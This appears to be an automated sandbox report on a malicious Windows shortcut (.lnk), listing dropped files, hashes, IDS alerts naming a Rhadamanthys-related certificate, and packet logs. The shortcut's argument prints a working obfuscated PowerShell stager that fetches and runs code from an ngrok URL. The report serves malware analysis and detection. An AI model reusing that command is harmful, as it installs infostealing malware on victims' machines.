                                                                                                                                                                                                                                                                                                                        Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir5440_1738678458\CRX_INSTALL\manifest.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):962
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.698567446030411
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                                                                                                                                                                                        MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                                                                                                                                                                                                        SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                                                                                                                                                                                        SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                                                                                                                                                                                                        SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..

                                                                                                                                                                                                                                                                                                                        C:\Users\user\Downloads\Lewis Silkin LLP.pdf (copy)

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:PDF document, version 1.7, 2 pages
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):106848
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.916846950395155
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:1536:/t7dsAjcYfnYKHqU4UDgCWuJhG/oEMKTKipqgdrP9sW32prNybV0MLQF2C/hy1T:lGY1YUPDgK6TlrPTsSVC/h8
                                                                                                                                                                                                                                                                                                                        MD5:14E5098503C76B02728CDE6EA96538C3
                                                                                                                                                                                                                                                                                                                        SHA1:88B84351C73D8E918BEA3DD7EB2178B9C466A342
                                                                                                                                                                                                                                                                                                                        SHA-256:7519554506D088A93C531F74F055E8966215CCC42C647382F6A95705172DCAFF
                                                                                                                                                                                                                                                                                                                        SHA-512:F8A88B3E86503F4422F599A279EBC8C9F3B552AC3F7495C92780FFE2B406FD1F2F855F0B47D1D0F543E058E90E7146A54ABF86B611FE4F071F46ECE6927D6087
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:%PDF-1.7..%......1 0 obj..<</Type/Catalog/Pages 2 0 R/Lang(en) /StructTreeRoot 25 0 R/MarkInfo<</Marked true>>/Metadata 85 0 R/ViewerPreferences 86 0 R>>..endobj..2 0 obj..<</Type/Pages/Count 2/Kids[ 3 0 R 20 0 R] >>..endobj..3 0 obj..<</Type/Page/Parent 2 0 R/Resources<</Font<</F1 5 0 R/F2 9 0 R/F3 11 0 R/F4 16 0 R>>/ExtGState<</GS7 7 0 R/GS8 8 0 R>>/XObject<</Image18 18 0 R/Image19 19 0 R>>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/MediaBox[ 0 0 612 792] /Contents 4 0 R/Group<</Type/Group/S/Transparency/CS/DeviceRGB>>/Tabs/S/StructParents 0>>..endobj..4 0 obj..<</Filter/FlateDecode/Length 2726>>..stream..x..[Y..F.~.`.C.EZH4....0G.8k....Y`.....0.H..g'.~..I.C.Wk..G..&....l.7..`WWo...g..wI.`...~z.__...;.....|./..,..0..../~..+./n?^^...3..q~y.a..8S".4g..=.wV0..-jx![.......Fl.o......u...`?..cl. w.0../...T..pup..b....9...x.F.r<.......Q._.........%^...G.Y`1GR.....C)7.X...j..X..f.8.e2......4.Uy.C...c<...L@S.+..,&.01........#.....0...q...Pz.......G..#.......+.p..."..K8..B....

                                                                                                                                                                                                                                                                                                                        C:\Users\user\Downloads\Unconfirmed 276163.crdownload (copy)

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:PDF document, version 1.7, 2 pages
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):106848
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.916846950395155
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:1536:/t7dsAjcYfnYKHqU4UDgCWuJhG/oEMKTKipqgdrP9sW32prNybV0MLQF2C/hy1T:lGY1YUPDgK6TlrPTsSVC/h8
                                                                                                                                                                                                                                                                                                                        MD5:14E5098503C76B02728CDE6EA96538C3
                                                                                                                                                                                                                                                                                                                        SHA1:88B84351C73D8E918BEA3DD7EB2178B9C466A342
                                                                                                                                                                                                                                                                                                                        SHA-256:7519554506D088A93C531F74F055E8966215CCC42C647382F6A95705172DCAFF
                                                                                                                                                                                                                                                                                                                        SHA-512:F8A88B3E86503F4422F599A279EBC8C9F3B552AC3F7495C92780FFE2B406FD1F2F855F0B47D1D0F543E058E90E7146A54ABF86B611FE4F071F46ECE6927D6087
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:%PDF-1.7..%......1 0 obj..<</Type/Catalog/Pages 2 0 R/Lang(en) /StructTreeRoot 25 0 R/MarkInfo<</Marked true>>/Metadata 85 0 R/ViewerPreferences 86 0 R>>..endobj..2 0 obj..<</Type/Pages/Count 2/Kids[ 3 0 R 20 0 R] >>..endobj..3 0 obj..<</Type/Page/Parent 2 0 R/Resources<</Font<</F1 5 0 R/F2 9 0 R/F3 11 0 R/F4 16 0 R>>/ExtGState<</GS7 7 0 R/GS8 8 0 R>>/XObject<</Image18 18 0 R/Image19 19 0 R>>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/MediaBox[ 0 0 612 792] /Contents 4 0 R/Group<</Type/Group/S/Transparency/CS/DeviceRGB>>/Tabs/S/StructParents 0>>..endobj..4 0 obj..<</Filter/FlateDecode/Length 2726>>..stream..x..[Y..F.~.`.C.EZH4....0G.8k....Y`.....0.H..g'.~..I.C.Wk..G..&....l.7..`WWo...g..wI.`...~z.__...;.....|./..,..0..../~..+./n?^^...3..q~y.a..8S".4g..=.wV0..-jx![.......Fl.o......u...`?..cl. w.0../...T..pup..b....9...x.F.r<.......Q._.........%^...G.Y`1GR.....C)7.X...j..X..f.8.e2......4.Uy.C...c<...L@S.+..,&.01........#.....0...q...Pz.......G..#.......+.p..."..K8..B....

                                                                                                                                                                                                                                                                                                                        C:\Users\user\Downloads\fb4b6a07-76d9-47d6-adb2-93b87e5b30d3.tmp

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:PDF document, version 1.7, 2 pages
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):106848
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.916846950395155
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:1536:/t7dsAjcYfnYKHqU4UDgCWuJhG/oEMKTKipqgdrP9sW32prNybV0MLQF2C/hy1T:lGY1YUPDgK6TlrPTsSVC/h8
                                                                                                                                                                                                                                                                                                                        MD5:14E5098503C76B02728CDE6EA96538C3
                                                                                                                                                                                                                                                                                                                        SHA1:88B84351C73D8E918BEA3DD7EB2178B9C466A342
                                                                                                                                                                                                                                                                                                                        SHA-256:7519554506D088A93C531F74F055E8966215CCC42C647382F6A95705172DCAFF
                                                                                                                                                                                                                                                                                                                        SHA-512:F8A88B3E86503F4422F599A279EBC8C9F3B552AC3F7495C92780FFE2B406FD1F2F855F0B47D1D0F543E058E90E7146A54ABF86B611FE4F071F46ECE6927D6087
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:%PDF-1.7..%......1 0 obj..<</Type/Catalog/Pages 2 0 R/Lang(en) /StructTreeRoot 25 0 R/MarkInfo<</Marked true>>/Metadata 85 0 R/ViewerPreferences 86 0 R>>..endobj..2 0 obj..<</Type/Pages/Count 2/Kids[ 3 0 R 20 0 R] >>..endobj..3 0 obj..<</Type/Page/Parent 2 0 R/Resources<</Font<</F1 5 0 R/F2 9 0 R/F3 11 0 R/F4 16 0 R>>/ExtGState<</GS7 7 0 R/GS8 8 0 R>>/XObject<</Image18 18 0 R/Image19 19 0 R>>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/MediaBox[ 0 0 612 792] /Contents 4 0 R/Group<</Type/Group/S/Transparency/CS/DeviceRGB>>/Tabs/S/StructParents 0>>..endobj..4 0 obj..<</Filter/FlateDecode/Length 2726>>..stream..x..[Y..F.~.`.C.EZH4....0G.8k....Y`.....0.H..g'.~..I.C.Wk..G..&....l.7..`WWo...g..wI.`...~z.__...;.....|./..,..0..../~..+./n?^^...3..q~y.a..8S".4g..=.wV0..-jx![.......Fl.o......u...`?..cl. w.0../...T..pup..b....9...x.F.r<.......Q._.........%^...G.Y`1GR.....C)7.X...j..X..f.8.e2......4.Uy.C...c<...L@S.+..,&.01........#.....0...q...Pz.......G..#.......+.p..."..K8..B....

                                                                                                                                                                                                                                                                                                                        C:\Users\user\Videos\DiskTuner\Bin\DiskTuner.exe

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1718218388.exe
                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):979567349
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.044015480209425
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                                                                                                        MD5:A9BE0EBB1CA01D7F9DB6A801CD111725
                                                                                                                                                                                                                                                                                                                        SHA1:EC0FD376ADA859BAF234C761951237EF1E3C7060
                                                                                                                                                                                                                                                                                                                        SHA-256:11BA48C61A24E61ECA3D3A83EC1815F0FDBFE8EBDEA5521A1C661A01DBBB96FC
                                                                                                                                                                                                                                                                                                                        SHA-512:02360FCB5C2F413BE350E0EE5A6E20E2D5E7E4D56CD7A0F039BC5B267E0ACDCF922696F1028D6BF3BC4C06584E5111A7FFF2EA4633198BC7F2A2132E7342365F
                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.................z..............z........#.............................Rich..................PE..L......C.....................`....................@...........................6.....Y.$..............................................."..............................................................................................................text............................... ..`.rdata...|..........................@..@.data....)...P.......P..............@....rsrc........."......0..............@..@................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                        C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):55
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.306461250274409
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                                                                                                                                        MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                                                                                                                                        SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                                                                                                                                        SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                                                                                                                                        SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                                                                                                                                                                                                                        C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):1835008
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.46954023720401
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:6144:OzZfpi6ceLPx9skLmb0fYZWSP3aJG8nAgeiJRMMhA2zX4WABluuNqjDH5S:QZHtYZWOKnMM6bFpoj4
                                                                                                                                                                                                                                                                                                                        MD5:96BBE117FDD6B2F05FF626308BFAD4D8
                                                                                                                                                                                                                                                                                                                        SHA1:9F2D60132ACEA2A90D2BF4524FEC70AA130E1156
                                                                                                                                                                                                                                                                                                                        SHA-256:D660BDA5D577586136AAE418FF1211E39367CAFF2676106C7E3831DBD83FCA15
                                                                                                                                                                                                                                                                                                                        SHA-512:677DB217B4FD463ECA0195653479C3E787836090461B9C39EADD34774D14037F9F80CA17616A62BB65D73BF005A8DC162709E7D47F9DDBFE27A2E8166F42B9CE
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.!U.*K..............................................................................................................................................................................................................................................................................................................................................f.C.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                        Static File Info

                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                        File type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=11, Archive, ctime=Thu Nov 28 22:32:21 2024, mtime=Sun Dec 1 16:36:54 2024, atime=Thu Nov 28 22:32:21 2024, length=289792, window=hide
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.726932219849776
                                                                                                                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                                                                                                                        • Windows Shortcut (20020/1) 100.00%
                                                                                                                                                                                                                                                                                                                        File name:taCCGTk8n1.lnk
                                                                                                                                                                                                                                                                                                                        File size:2'614 bytes
                                                                                                                                                                                                                                                                                                                        MD5:791c4736be53604b8bb0979bac3a49b8
                                                                                                                                                                                                                                                                                                                        SHA1:6c406a9f2942d6fbe7d5df5a9b6b050c250c4a4e
                                                                                                                                                                                                                                                                                                                        SHA256:48ea3e8097aa3314fc7fbfb73abdc072031989ef9ba14ff669d40c0633d13845
                                                                                                                                                                                                                                                                                                                        SHA512:efa2abfb64ef09e342fbe6907d26c65bd75edcc6c201680bae84089209939611464c345987def36508893405af3b17b74c5067ca43b40c26a8f7f2633534d46d
                                                                                                                                                                                                                                                                                                                        SSDEEP:48:8GIgax4PsU/ue7qCLOrI+/Gd0lL4XuH4Xv3SsgoQYk:8fgaxEs2ueHOcwdl2uWvZg5Y
                                                                                                                                                                                                                                                                                                                        TLSH:7251BF252FD91735F3B34E3689B7A2518E3BBD46AD364F2E408042880C52B15EC76F2B
                                                                                                                                                                                                                                                                                                                        File Content Preview:L..................F.@.. ....Q...A.......D.......A...l......................5....P.O. .:i.....+00.../C:\...................V.1......Y'...Windows.@........OwH.Y(...........................-...W.i.n.d.o.w.s.....Z.1......Y)...System32..B........OwH.YI.......

                                                                                                                                                                                                                                                                                                                        File Icon

                                                                                                                                                                                                                                                                                                                        Icon Hash:72d282828e8d8dd5

                                                                                                                                                                                                                                                                                                                        Static Windows Shortcut Info

                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                        Relative Path:..\..\..\..\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                        Command Line Argument:/c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias a0b802 curl ; sal 9bdb99 iEx ; 9bdb99(a0b802 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/220836f7ecc9edc92da5931044d3532a -UseBasicParsing)
                                                                                                                                                                                                                                                                                                                        Icon location:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

                                                                                                                                                                                                                                                                                                                        Network Behavior

                                                                                                                                                                                                                                                                                                                        Suricata IDS Alerts

                                                                                                                                                                                                                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                                                                        2024-12-10T18:40:24.854097+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649731162.125.65.18443TCP
                                                                                                                                                                                                                                                                                                                        2024-12-10T18:40:38.320821+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649817162.125.65.18443TCP
                                                                                                                                                                                                                                                                                                                        2024-12-10T18:41:11.285923+01002854802ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert1104.161.43.182845192.168.2.649908TCP

                                                                                                                                                                                                                                                                                                                        Network Port Distribution

                                                                                                                                                                                                                                                                                                                        TCP Packets

                                                                                                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:39:57.825872898 CET4434970620.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:39:57.825958967 CET4434970620.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:39:57.825972080 CET4434970620.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:39:57.826010942 CET49706443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:39:57.826169014 CET4434970620.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:39:57.826217890 CET49706443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:39:57.828696966 CET49706443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:39:57.948026896 CET4434970620.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:39:57.983603954 CET4434970540.126.53.8192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:39:57.983697891 CET4434970540.126.53.8192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:39:57.983710051 CET4434970540.126.53.8192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:39:57.983784914 CET49705443192.168.2.640.126.53.8
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:39:57.983839989 CET4434970540.126.53.8192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:39:57.983851910 CET4434970540.126.53.8192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:39:57.983896017 CET49705443192.168.2.640.126.53.8
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:39:57.991906881 CET4434970540.126.53.8192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:39:57.991955996 CET4434970540.126.53.8192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:39:57.991966009 CET49705443192.168.2.640.126.53.8
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:39:58.000281096 CET4434970540.126.53.8192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:39:58.000334024 CET49705443192.168.2.640.126.53.8
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:39:58.000364065 CET4434970540.126.53.8192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:39:58.008697033 CET4434970540.126.53.8192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:39:58.008750916 CET49705443192.168.2.640.126.53.8
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:39:58.008774042 CET4434970540.126.53.8192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:39:58.057003021 CET49705443192.168.2.640.126.53.8
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:39:58.375854015 CET4434970620.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:39:58.377228975 CET49706443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:39:58.377288103 CET49706443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:39:58.377368927 CET49706443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:39:58.496665001 CET4434970620.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:39:58.496676922 CET4434970620.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:39:58.496778011 CET4434970620.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:39:58.923458099 CET4434970620.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:39:58.963304043 CET49706443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:39:59.115464926 CET4434970620.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:39:59.116467953 CET49706443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:39:59.235800028 CET4434970620.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:39:59.661367893 CET4434970620.198.119.84192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:39:59.713248968 CET49706443192.168.2.620.198.119.84
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:39:59.932023048 CET49674443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:39:59.932023048 CET49673443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:00.135160923 CET49672443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:05.940193892 CET49707443192.168.2.63.125.209.94
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:05.940257072 CET443497073.125.209.94192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:05.940351963 CET49707443192.168.2.63.125.209.94
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:05.954076052 CET49707443192.168.2.63.125.209.94
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:05.954127073 CET443497073.125.209.94192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:07.358834982 CET443497073.125.209.94192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:07.358978033 CET49707443192.168.2.63.125.209.94
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:07.362943888 CET49707443192.168.2.63.125.209.94
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:07.362970114 CET443497073.125.209.94192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:07.363390923 CET443497073.125.209.94192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:07.380263090 CET49707443192.168.2.63.125.209.94
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:07.427350044 CET443497073.125.209.94192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:08.235333920 CET49708443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:08.235382080 CET4434970820.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:08.235461950 CET49708443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:08.236042976 CET49708443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:08.236054897 CET4434970820.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:09.508668900 CET443497073.125.209.94192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:09.508894920 CET443497073.125.209.94192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:09.508945942 CET49707443192.168.2.63.125.209.94
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:09.512576103 CET49707443192.168.2.63.125.209.94
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:09.541368008 CET49673443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:09.541374922 CET49674443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:09.736363888 CET49709443192.168.2.6162.125.65.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:09.736407995 CET44349709162.125.65.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:09.736478090 CET49709443192.168.2.6162.125.65.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:09.736812115 CET49709443192.168.2.6162.125.65.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:09.736825943 CET44349709162.125.65.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:09.744530916 CET49672443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:10.471227884 CET4434970820.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:10.471383095 CET49708443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:10.478750944 CET49708443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:10.478771925 CET4434970820.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:10.479068041 CET4434970820.198.118.190192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:10.480791092 CET49708443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:10.480854034 CET49708443192.168.2.620.198.118.190
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:40:10.480865002 CET4434970820.198.118.190192.168.2.6
